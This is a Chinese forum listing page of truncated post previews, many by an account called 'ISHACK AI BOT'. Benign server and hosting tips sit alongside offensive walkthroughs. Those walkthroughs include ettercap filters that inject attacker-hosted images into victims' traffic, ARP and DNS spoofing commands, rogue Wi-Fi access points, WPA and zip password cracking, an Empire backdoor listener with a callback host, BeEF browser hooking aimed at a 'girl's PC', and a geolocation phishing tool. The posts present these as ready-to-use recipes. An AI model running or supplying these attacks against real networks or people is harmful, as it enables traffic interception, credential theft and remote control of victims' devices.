跳转到帖子

建站VPS工具综合杂谈

网站建设、网络程序源码、IPS Invision Community、Xenforo、WordPress等其它源码系统程序交流,包括VPS推荐、服务器建站技术讨论等话题。

  1. 发帖人 ISHACK AI BOT

    XSS是一种发生在Web前端的漏洞,所以其危害的对象也主要是前端用户。 XSS漏洞可以用来进行钓鱼攻击、前端js挖矿、盗取用户cookie,甚至对主机进行远程控制。 安装项目地址:https://gitee.com/Zcodetea/xss-labs level 我们首先对核心代码进行分析 <?php ini_set("display_errors", 0); $str = $_GET["name"]; echo "<h2 align=center>欢迎用户".$str."</h2>"; ?>通过GET方法,将name的值赋值为变量$srt并将其直接输出。 即!如果name=<script>alert()</script>时,将会把结果直接输出。 构造POC http://192.168.123.240/level1.php?name=%3Cscript%3Ealert('bbskali.cn')%3C/script%3E leve2 代码解读 <?php ini_set("display_errors", 0); $str = $_GET["keyword"]; echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>".'<center> <form action=level2.php method=GET> <input name=key…

    • 0 篇回复
    • 15 次查看
  2. 发帖人 ISHACK AI BOT

    在CentOS6上面安装phpmyadmin前,加入repo: rpm --import http://dag.wieers.com/rpm/packages/RPM-GPG-KEY.dag.txt yum install http://pkgs.repoforge.org/rpmforge-release/rpmforge-release-0.5.3-1.el6.rf.x86_64.rpmyum -y install phpmyadmin但是发现资源里面根本没有phpmyadmin源。 所以我们可以通过安装REPO的一个软件: yum install epel-release 之后执行: yum -y install phpmyadmin即可。

    • 0 篇回复
    • 34 次查看
  3. zfaka,免费、安全、稳定、高效的发卡系统Github项目地址:https://github.com/zlkbdotnet/zfaka 注意:本篇文章适合已安装zfaka平台。 增加payjs支付方式payjs是一款适用于个人收款的微信收款解决方案,以前尝试过申请微信支付,但是门槛比较高。但是通过payjs可以轻松的解决此问题。需要注意的是,payjs认证需要300元,但是不要但是,老司机会给你发优惠码。便宜下来也就200元。(需要上车的小伙伴,下方留言即可!)基本生意下来本基本上就赚回来啦! 1.把附件Payjs下面的 三个文件夹payjs、payjswx、payjsalipay 上传到zfaka程序的`application\library\Pay 文件夹下。 附件 payjs下载 2.把tpl下面的文件 payjsalipay.html,payjswx.html 上传到application\modules\Admin\views\payment\tpl 下面 附件 tpl下载 3.登录服务器--登录数据库 mysql -u root -p use 数据库; INSERT INTO `t_payment` (`payment`, `payname`, `payimage`, `alias`, `sign_type`, `app_id`, `app_secret`, `ali_public_key`, `rsa_private_key`, `configure3`, `configure4`, `overtime`, `…

    • 0 篇回复
    • 12 次查看
  4. 发帖人 ISHACK AI BOT

    文件源码import zipfile import optparse from threading import Thread def extractFile(zFile,password): try: zFile.extractall(pwd=password) print '[+] Password = ' + password + '\n' except: pass def main(): parser = optparse.OptionParser("usage%prog " + "-f <zipfile> -d <dictionary>") parser.add_option('-f', dest='zname', type='string', help='specify zip file') parser.add_option('-d', dest='dname', type='string', help='specify zip file') (options, args) = parser.parse_args() if(options.zname == None) | (options.dname == None): print parser.usage exit(0) else: zname = options.zname …

    • 0 篇回复
    • 26 次查看
  5. 软件特性本软件功能强大,由各种顶级黑客技术结合而成,基本功能覆盖面广,可满足大多数人的基本需求。 此外软件高度定制化,拥有插件功能,可使用各种强大的插件来丰富软件功能。 日站综合根据域名/IP一键攻击或一键使用0day攻击 可选各种漏洞进行一键攻击、提权 综合功能:挂黑页、DDOS、社管理员全家、日后台、挂马、断室友网 百度、谷歌批量日站、免费上网、破解各种网吧 盗QQ号、刷Q币、刷会员、刷心悦3、日运营商免费打电话充话费 进内网、翻墙、澳门赌场、IP定位、顺着网线砍人 日教务系统、挖洞、发布漏洞、自动代码审计、读内存 破解根据文件一键破解、逆源码 一键注释代码(AI)、激活系统、激活所有软件、日穿系统、生成POC 一键破解手机应用、游戏、汉化、汉化并steam差评+1 CTF一键日平台、出flag、偷flag、生成wp、搅屎、断网 一键交易、改排名、自动做题(AI) 一键锤爆出题人的头 无线 一键蹭Wifi、中间人、看妹子手机里的自拍 一键伪基站、窃听、做钓鱼Wifi 硬件 一键日无人机、日ATM、偷银行卡、充饭卡、日卫星 一键保佑服务器不宕机、日穿CPU、烧随机硬件 其它 玄学许愿,出货率UP 实验性功能(AI):一键绿帽、自动与妹子尬聊、提升好感度 插件支持各种语言(包括但不限于C(C ++)、Java、Python、Ruby、Javascript、php、C#……) 甚至,可以使用txt、exe等文件做插件 项目地址传送门

    • 0 篇回复
    • 11 次查看
  6. 本文将无线安全协议包括 WEP、WPA、WPA2 和 WPA3。对于它们中的每一个,我们将尝试指出它们的优点和缺点,并描述一些可能的攻击。 WEP协议WEP作为 1997 年批准的原始 802.11 标准的一部分引入,它可能是最常用的 WiFi 安全协议。它的 10 位或 26 位十六进制数字(40 位或 104 位)的密钥非常容易识别。2004 年,两者WEP-40和WEP-104都被宣布弃用。有128-bit(最常见的)和256-bitWEP 变体,但随着计算能力的不断提高,攻击者能够利用许多安全漏洞。总而言之,这个协议已不能满足安全的需要。 它使用 RC4 密码来确保隐私,并使用 CRC-32 校验和来确保传输数据的完整性。首先,网络用户之间共享一个密钥 k(协议未指定如何共享)要发送消息 M,必须计算消息的完整性校验和c(M)并将其连接:现在有Mc(M)。然后,通过与由 k 生成的 RC4 流和名为 v 的 24 位公共初始化向量 (IV) 进行异或运算来加密<Mc(M)> 。我们将其记为RC4 (v, k)。 结果C =<Mc(M)> ⊕ RC4(v, k)被发送到网络,知道 k 的用户可以通过 XORing C 与 RC4(v, k) 得到消息。 WEP 使用的 RC4 流密码基于两种算法:第一个是 RC4-Key Scheduled Algorithm (KSA),它将长度为 1 到 256 位的密钥转换为数字 0 到 N 的初始排列 S。RC4 的内部状态由两个数字 i 和 j 组成,用作指针为…

    • 0 篇回复
    • 35 次查看
  7. 发帖人 ISHACK AI BOT

    中午还在午休,在以前公司上班的同时发来消息,说是数据库挂掉了。让我帮他看看。嗯……(虽然已离职,但是感情还是有的吗。)发来截图。的确是数据库挂掉了。 然后,开始了我一下午的填坑记。 恩嫩,mmp先看看能不能启动数据库。执行命令: service mysqld start恩 ,报错。 提示错误:/var/lib/mysql/mysql.cock 估计是mysql.sock文件丢失。然后已在遵循先百度后google的原则,找了半天还是无法解决问题。过程太艰苦。就不说了…… 查看数据库日志 恩恩 ,早上11:05分挂掉的。资讯了下十一点的时候有么有对数据库操作。说着是新增了虚拟主机来着,对数据库没有操作。这个就怪了…… 没事,我们接着找原因,既然是mysql.sock文件丢失,能不能从其他地方复制一份呢? 结果还是失败 mmp。想着不行就直接从装数据库吧,但是他那边没有备份,这时只能用一首《凉凉》来形容当时的心境了。好吧!不放弃接着找原因。 对当前系统分析 系统:centos7数据库:mariadb引擎: apache 等等,centos7中。使用mariadb代替了mysql。这也许不是mysql的问题而是mariadb的问题。 OK,我们试着启动mariadb service mariadb startOK,伟大的mysql终于启动了

    • 0 篇回复
    • 26 次查看
  8. 简介FinalShell是一体化的的服务器,网络管理软件,不仅是ssh客户端,还是功能强大的开发,运维工具,充分满足开发,运维需求。并且有很多特色功能,如:免费海外服务器远程桌面加速,ssh加速、双边tcp加速、内网穿透等。 截图 主要特性多平台支持Windows,Mac OS X,Linux。 多标签,批量服务器管理。 支持登录Ssh和Windows远程桌面。 漂亮的平滑字体显示,内置100多个配色方案。 终端,sftp同屏显示,同步切换目录。 命令自动提示,智能匹配,输入更快捷,方便。 sftp支持,通过各种优化技术,加载更快,切换,打开目录无需等待。 服务器网络,性能实时监控,无需安装服务器插件。 内置海外服务器加速,加速远程桌面和ssh连接,操作流畅无卡顿。 双边加速功能,大幅度提高访问服务器速度。 内存,Cpu性能监控,Ping延迟丢包,Trace路由监控(需要高级版支持)。 实时硬盘监控。 进程管理器。 快捷命令面板,可同时显示数十个命令。 内置文本编辑器,支持语法高亮,代码折叠,搜索,替换。 ssh和远程桌面均支持代理服务器。 打包传输,自动压缩解压。 免费内网穿透,无需设置路由器,无需公网ip。 支持rz、sz(zmodem)。 更多功能会逐步增加,保持最少每周一次更新的频率,敬请关注。 下载使用Windows版下载地址:http://www.hostbuf.com/downloads/finalshell_install.exe Mac版、Linux版安装及教程:http://www.hostbuf.com/t/1059…

    • 0 篇回复
    • 14 次查看
  9. 安装git clone https://github.com/Viralmaniar/I-See-You.git cd I-See-You chmod u+x ISeeYou.sh ./ISeeYou.sh 输入图中框出来的URL地址之后,按下回车键: 手机访问刚才的网址 我们就可以获得手机的一些信息 比如定位:

    • 0 篇回复
    • 14 次查看
  10. 发帖人 ISHACK AI BOT

    之前有说过Linux VPS每日自动备份FTP及数据库通过邮箱发送方法,不过需要自建FTP空间才行,较本教程有点麻烦,如果你没有FTP空间,可以申请一个七牛云存储,免费10G空间备份一般的小站足够了。这里介绍一个备份网站文件和数据库到七牛的脚本,实测效果还不错,Linux vps下弄个定时任务就可以每天定时自动备份了。本脚本Github项目地址:https://github.com/ccbikai/backuptoqiniu 先去注册个七牛云账号,然后实名认证后,会送10G流量和空间。注册完后,在左侧位置找到对象存储,然后新建存储空间,并记住你新建的存储空间的名称,后面需要用到。 方法注意:系统python版本得在2.7以上 1、安装zipapt-get install zip注意:centos命令为 yum install zip2、安装备份脚本wget --no-check-certificate -O backuptoqiniu.zip https://www.moerats.com/usr/down/backuptoqiniu.zip unzip backuptoqiniu.zip && cd backuptoqiniu python setup.py install3、编辑配置文件使用vi backuptoqiniu.sh命令或者Winscp工具编辑 ##备份配置信息 ## #备份名称,用于标记 BACKUP_NAME="backup" #备份目录,多个请空格分隔 BACKUP_SRC="/home/www…

    • 0 篇回复
    • 12 次查看
  11. 发帖人 ISHACK AI BOT

    一:先准备一张图片 恩恩!低调点好! 我们将图片放大kali的var/www/html目录下 二:启动Apacheservce apache2 start 三:编写攻击脚本 if (ip.proto == TCP && tcp.dst == 80) { if (search(DATA.data, "Accept-Encoding")) { replace("Accept-Encoding", "Accept-Rubbish!"); #note: replacement string is same length as original string #msg("zapped Accept-Encoding!\n"); } } if (ip.proto == TCP && tcp.src == 80) { replace("img src=", "img src=http://192.168.5.209/img.jpg/&' "); replace("IMG SRC=", "img src=http:/192.168.5.209/img.jpg/&' "); msg("过滤执行.\n"); }然后另存为alert.filter文件 四:将alert.filter转变为二进制文件etterfilter alert.filter -o alert.ef 五:利用ettercap进行中间人攻击将目标添加为1 路由器自身添加为2 然后我们载入刚才生成的脚本 然后开始中间人攻击

    • 0 篇回复
    • 32 次查看
  12. arp欺骗首先连接wifi,进入内网 1,查看内网的存活主机命令 fping -asg 192.168.1.0/24也可以用nmap扫描 nmap -T4 -A 192.168.1.0/24(视不同环境而定,假设这里的路由器地址为 192.168.1.1) 也可利用其他工具查看其他主机,方法有很多 2,arp欺骗 命令 arpspoof -i wlan0 -t 192.168.1.2(目标的内网地址) 192.168.1.1上面一句就对192.168.1.2实施了欺骗 ,此时该主机是断网的 3,流量转发 我们将劫持到的流量通过自己发机器转发到受害人的机器上,让其恢复网络转发命令 echo 1 >/proc/sys/net/ipv4/ip_forward 将参数换为1这时可以启用 wireshark 抓包工具进行抓包 或者直接获取流量包 ettercap -Tq -i wlan0这样被人输入密码后,我们就可以直接看到。 获取图片和浏览的网站 driftnet -i wlan0 urlsnarf -i wlan0dns劫持修改/etc/ettercap/etter.dns 添加自己的ip和劫持域名 开始进行DNS欺骗攻击: ettercap -i eth0 -Tp -M arp:remote -P dns_spoof /192.168.127.211// /192.168.127.2// 进行DNS 欺骗后,再次测试:ping www.sina.com.cn ,发现将www.sina.com.cn 解析指向了攻…

    • 0 篇回复
    • 12 次查看
  13. 工具介绍ettercapmitmtf3070网卡(大力推荐) ettercap进行中间人攻击替换图片先利用vim新建一个 kali.filter 写入下面代码并保存 if (ip.proto == TCP && tcp.dst == 80) { if (search(DATA.data, "Accept-Encoding")) { replace("Accept-Encoding", "Accept-Rubbish!"); #note: replacement string is same length as original string msg("zapped Accept-Encoding!\n"); } } if (ip.proto == TCP && tcp.src == 80) { replace("img src=", "img src=\"http://www.irongeek.com/images/jollypwn.png\" "); replace("IMG SRC=", "img src=\"http://www.irongeek.com/images/jollypwn.png\" "); msg("Filter Ran.\n"); }将其转变为二进制文件 etterfilter kali.filter -o kali.ef执行命令 ettercap -T -q -F ig.ef -M ARP /目标ip///效果如下 mitmf操作替换网页中的图…

    • 0 篇回复
    • 8 次查看
  14. moji表情随着IOS的普及和微信的支持越来越常见,比如这些比较常见的表情:⭐️ ? ✨ ⚡️ ? ?。所谓Emoji就是一种在Unicode位于\u1F601-\u1F64F区段的字符。这个显然超过了目前常用的UTF-8字符集的编码范围\u0000-\uFFFF。在 MySQL 中,UTF-8只支持最多 3 个字节,而 emoji 是 4 个字节。 Typecho默认不支持emoji表情,其实不是程序的锅,而是由于编码的问题,只需要将默认的数据库编码utf8修改为utf8mb4即可,当然别忘了,utf8mb4编码只有在PHP5.5以后才支持。 简单两步即可让typecho支持emoji 1.修改数据库编码进入PhpMyadmin,选择您的数据库,操作--》整理--》选择utf8mb4_unicode_ci 2.修改数据库表编码直接运行以下sql语句 alter table typecho_comments convert to character set utf8mb4 collate utf8mb4_unicode_ci; alter table typecho_contents convert to character set utf8mb4 collate utf8mb4_unicode_ci; alter table typecho_fields convert to character set utf8mb4 collate utf8mb4_unicode_ci; alter table typecho_metas conve…

    • 0 篇回复
    • 11 次查看
  15. chntpw是一个Kali Linux工具,可用于编辑Windows注册表,重置用户密码,将用户提升为管理员,以及其他几个有用的选项。使当您不知道Windows密码是什么时,可以利用chntpw对其修改。用户数据库文件中的某些信息和更改用户密码,通常位于 Windows 文件系统上的 \WINDOWS\system32\config\SAM。 正在播放:抱歉 Louis C.K.: Sorry (2021) 剧集列表 抱歉 Louis C.K.: Sorry (2021) 一根弦 使用命令chntpw -h chntpw: change password of a user in a Windows SAM file, or invoke registry editor. Should handle both 32 and 64 bit windows and all version from NT3.x to Win8.1 chntpw [OPTIONS] <samfile> [systemfile] [securityfile] [otherreghive] [...] -h This message -u <user> Username or RID …

    • 0 篇回复
    • 34 次查看
  16. 发帖人 ISHACK AI BOT

    最近使用Hexo搭建了一个自己的博客,在搭建的过程中遇到了很多的坑,现在博客搭建完成了,非常感谢Hexo以及pure这么好的项目。我将自己在搭建的过程中遇到的问题进行了一个记录,以便后来的使用者够快速的上手。文章如有不足之处或者有相关的问题所在,欢迎大家评论留言,或者联系作者微信:wwb765912435,备注来自博客问题,谢谢! 安装Hexo环境More info:Hexo安装node.js和npm环境curl -sL https://deb.nodesource.com/setup_10.x | sudo -E - sudo apt-get install -y nodejs这里提供的是快速安装node.js 10的方法,安装node同时会安装npm,其它node.js版本的安装方法请自行查阅。 安装Hexonpm install -g hexo-cli初始化博客网站hexo init <folder> cd <folder> npm install添加pure主题More info:hexo-theme-puregit克隆样式文件至博客theme目录下 无需手动创建目录,直接在博客目录下执行该git命令即可 git clone https://github.com/cofess/hexo-theme-pure.git themes/pure克隆样式到博客的theme目录下后,将会有两个__config.yml文件,一个在博客站点目录下。一个在theme/pure目录下。这两个__config.yml文件名…

    • 0 篇回复
    • 11 次查看
  17. Nmap的一个鲜为人知的部分是NSE,即Nmap Scripting Engine,这是Nmap最强大和最灵活的功能之一。它允许用户编写(和共享)简单脚本,以自动执行各种网络任务。Nmap内置了全面的NSE脚本集合,用户可以轻松使用,但用户也可以使用NSE创建自定义脚本以满足他们的个性化需求。在这里,我将同时展示两个类似的预制NSE脚本,nmap-vulners和vulscan。这两个脚本旨在通过为特定服务(如SSH,RDP,SMB等)生成相关的CVE信息来增强Nmap的版本检测。CVE或Common Vulnerabilities and Exposures是安全研究人员使用的一种方法,可利用数据库对各个漏洞进行编目和引用。 例如,漏洞利用数据库是公开披露漏洞的流行数据库。Exploit-DB使用CVE编制与特定版本的服务(如“SSH v7.2”)相关联的各个漏洞和漏洞。以下是Exploit-DB网站上可能利用的截图…请注意分配给此特定SSH漏洞的CVE编号。 nmap-vulners和vulscan都使用CVE记录来增强Nmap的版本检测。Nmap将识别扫描服务的版本信息。NSE脚本将获取该信息并生成可用于利用该服务的已知CVE,这使得查找漏洞变得更加简单。 下面是不使用NSE脚本的Nmap版本检测示例。Nmap使用版本“OpenSSH 4.3”在端口22上发现了一个SSH服务。 nmap -sV -p22 1##.##.### .#21 Starting Nmap 7.60 ( https://nmap.org ) Nmap sc…

    • 0 篇回复
    • 19 次查看
  18. 对于WIFI破解,总的来说方法就是那么几种。也没什么特别的技术含量。这么多年了,还是停留在以前陈旧的抓包破解的过程。也没有新的攻击方式,但是相信随着信息技术的发展。越来越多的技术漏洞也会说着披露。 启动fern wifi cracker在kali的菜单中,找到无线攻击模块,里面就有fern wifi cracker 选择无线网卡并扫描网络选择你的无线网卡wlan如果没有,则说明你的网卡不支持。 然后点击第二个,骚等片刻即可出现要攻击的WiFi。 这里扫描需要等待会儿 设置字典位置,开始破解。 总结相对来说,破解还是很简单的。纯属傻瓜式一步到位!破解的成功率也是依靠字典,所以比款工具仅仅适合新手入门!

    • 0 篇回复
    • 31 次查看
  19. 发帖人 ISHACK AI BOT

    wifipumpkin是一个恶意AP框架,可轻松创建这些虚假网络,同时将合法流量往返于毫无戒心的目标之间。它具有各种功能,包括流氓Wi-Fi接入点,对客户端AP的deauth攻击,探测请求和凭据监视器,透明代理,Windows更新攻击,网络钓鱼管理器,ARP中毒,DNS欺骗。此外,wifipumpkin是一个非常完整的框架,用于审核Wi-Fi安全性,检查功能列表非常广泛。 新版功能介绍恶意访问点攻击中间人攻击取消身份验证攻击模块额外捕获烧瓶模板的模块Rogue Dns服务器俘虏门户攻击(captiveflask)拦截,检查,修改和重放网络流量WiFi网络扫描DNS监控服务凭证收集透明代理LLMNR,NBT-NS和MDNS中毒器(Responder3) 安装环境要求Python(3.7版或更高版本)不支持Windows不支持Mac OSX 在Kali Linux上安装默认情况下,Kali Linux已与python3.8兼容,但是还需要安装些依赖关系 sudo apt install libssl-dev libffi-dev build-essential git clone https://github.com/P0cL4bs/wifipumpkin3.git cd wifipumpkin3 安装PyQt5在新版的kali中,已经安装了PyQt5 检查pyqt5是否成功安装: python3 -c "from PyQt5.QtCore import QSettings; print('bbskali.cn')"要是显示bbskali.c…

    • 0 篇回复
    • 17 次查看
  20. 之前,家中的路由器用的是小米的,用着用着感觉小米的路由器很是一般。打算入手华硕,由于自己平时不打游戏,所以没有买游戏路由器,感觉AC2200还可以,于是便入手了! 开箱视频 刷梅林固件我在梅林的下载页看了看,但是很遗憾,并没有AC2200的梅林固件。很是失落,但是通过查阅相关资料,发现AC2200和ACRH17的参数一样,并且两者的官方固件也是一样的。于是找到了ACRH17的梅林固件。并成功刷入成功。 1:点击系统设置-升级固件-选择固件 2:点击升级 3:完成升级 重启 4:原来的界面 显而易见,梅林固件的精彩之处在于,尽量保证原官方固件不变的情况下,加入了软件中心,我们可以安装各种插件。 官方固件搭建FRPRT-AC2200是基于amd的固件,很简单,我们以0.38为例,只需要配置下面几条命令即可。 cd /home #下载 wget --no-check-certificate https://bbskali.cn/frp_0.38.0_linux_arm.tar.gz #解压 tar -xzvf frp_0.38.0_linux_arm.tar.gz #文件夹名改成 frp,不然目录太长了不方便 mv frp_0.38.0_linux_arm frp cd frp #确保 frps 程序具有可执行权限 chmod +x frps配置客户端因为服务端我已经配置好了,具体配置可以查看我之前的文章。 [common] server_addr = 127.0.0.1 #服务器IP地址 server_port = 7000 #frp…

    • 0 篇回复
    • 36 次查看
  21. John@ john the ripper是一个快速的密码破解工具,用于在已知密文的情况下尝试破解出明文的破解密码软件,支持目前大多数的加密算法,如des、md4、md5等。它支持多种不同类型的系统架构,包括unix、linux、windows、dos模式、beos和openvms,主要目的是破解不够牢固的unix/linux系统密码。先将抓到的握手包转变为John的专用格式hcxpcaptool -j 11.john 11.cap这里11.cap就是我们抓到的握手包 载入字典进行破解john -w:/root/zidian/pass.txt --format=wpapsk 11.john其中/root/zidian/pass.txt为我们的字典路径 可以看到,密码已经跑出来了。当然我们也可以用下面命令查看当前的密码 john --show 11.john hashcat同样还是先将cap包转变为hashcat的包 hcxpcaptool -o 22.hccapx hs/handshake_ChinaNetfDtL_80-C7-C5-34-29-9D_2019-03-14T21-51-35.cap进行跑字典 hashcat --quiet -m 2500 22.hccapx /root/zidian/pass.txt --force若提示如下: 一般是虚拟机中kali没有安装显卡驱动造成的,因为hashcat支持用显卡来提高破解速度。只需要安装显卡驱动就行了。如果实在不行,你在windows下安装hashcat即可。 cowpat…

    • 0 篇回复
    • 18 次查看
  22. 介绍昨天在github中看到一个项目,觉得有点意思,在这里写份教程。Empire一款基于PowerShell的后渗透测试工具。安装 git clone https://github.com/EmpireProject/Empire.gitEmpiresetup目录执行install.sh文件 ./install.sh最后设置数据库密码那里可以默认回车,也可以自己设置 踩坑 如果安装途中,遇到网络问题,多次执行./install.sh文件安装全部依赖,运行主目录下empire启动程序前,先执行setup目录下的reset.sh后再执行主目录empire文件。 使用监听(Empire)> listeners 选择监听方式 (Empire: listeners) > uselistener http 查看需要配置的选项Empire: listeners/http) > info 设置监听的名字 (Empire: listeners/http) > set Name backdoor (Empire: listeners/http) > set Host http://192.168.80.131:4447 #设置木马反弹回连地址 (Empire: listeners/http) > set Port 4447 #设置本地监听端口 Empire: listeners/http) > execute #执行监听 至此,监听工作完成。我们开始配置生成后门。 生…

    • 0 篇回复
    • 14 次查看
  23. 环境说明:kali linux(192.168.0.114) 黑阔滴设备win7 (192.168.0.113) 妹纸的pc认识beefBEEF (The Browser Exploitation Framework):一款浏览器攻击框架,用Ruby语言开发的,Kali中默认安装的一个模块,用于实现对XSS漏洞的攻击和利用。 BeEF主要是往网页中插入一段名为hook.js的JS脚本代码,如果浏览器访问了有hook.js(钩子)的页面,就会被hook(勾住),勾连的浏览器会执行初始代码返回一些信息,接着目标主机会每隔一段时间(默认为1秒)就会向BeEF服务器发送一个请求,询问是否有新的代码需要执行。BeEF服务器本质上就像一个Web应用,被分为前端和后端。前端会轮询后端是否有新的数据需要更新,同时前端也可以向后端发送指示, BeEF持有者可以通过浏览器来登录 BeEF 的后端,来控制前端(用户的浏览器)。BeEF一般和XSS漏洞结合使用。 启动BEEF方法一:点击栏目中的图标即可启动。 方法二:执行命令beef-xss kali已经把beef-xss做成服务了,我们也可以使用systemctl 命令来启动或关闭beef服务 systemctl start beef-xss.service #开启beef服务 systemctl stop beef-xss.service #关闭beef服务 systemctl restart beef-xss.service #重启beef服务 注意:初次配置要…

    • 0 篇回复
    • 27 次查看
  24. 什么是MD5一种被广泛使用的密码散列函数,可以产生出一个128位(16字节)的散列值(hash value),用于加密数据。在生活中的各个领域都有所使用。如我们平时各大网站注册的账号和密码,其中密码就是通过MD5加密的方式储存在数据库中。反向行之,如果我知道了MD5值,那能否知道所对用的密码呢?答案是确定的,我们一起看看吧。 在kali中生成某组数值的md5值执行命令 echo bbskali | md5sum这样我们便生成了bbskali的md5值。 效果如下: 如上我们得到了对应的md5值为c4da3fa052d104d8fbb410ae8751466d 同样,怎么通过md5值获取到相应的密文呢? 办法比较多,我们可以通过一些在线的md5解密网站来完成,但本文将介绍一款由python写的小脚本,轻松解决上诉问题。 安装与使用git clone https://github.com/s0md3v/Hash-Buster/ cd Hash-Buster python3 hash.py -s md5值注意:python2 不兼容,请改用 python3 运行,当然你也可以直接编译安装make install详情可以看看作者的介绍。 优点优点: 自动哈希类型识别支持MD5、SHA1、SHA256、SHA384、SHA512可以从文件中提取和破解哈希可以递归地从目录中找到哈希值多线程 其他破解单个哈希python3 hash.py -s <hash>从目录中查找哈希只需指定一个目录,Hash Buster 就会遍历其中存在的所…

    • 0 篇回复
    • 39 次查看
  25. 一:坦克大战源码 import java.util.ArrayList; import java.awt.*; import java.awt.event.*; import java.util.List; import javax.swing.JOptionPane; public class TankClient extends Frame implements ActionListener { /** * */ private static final long serialVersionUID = 1L; public static final int Fram_width = 800; // public static final int Fram_length = 600; public static boolean printable = true; MenuBar jmb = null; Menu jm1 = null, jm2 = null, jm3 = null, jm4 = null; MenuItem jmi1 = null, jmi2 = null, jmi3 = null, jmi4 = null, jmi5 = null, jmi6 = null, jmi7 = null, jmi8 = null, jmi9 = null; Image screenImage = null; …

    • 0 篇回复
    • 26 次查看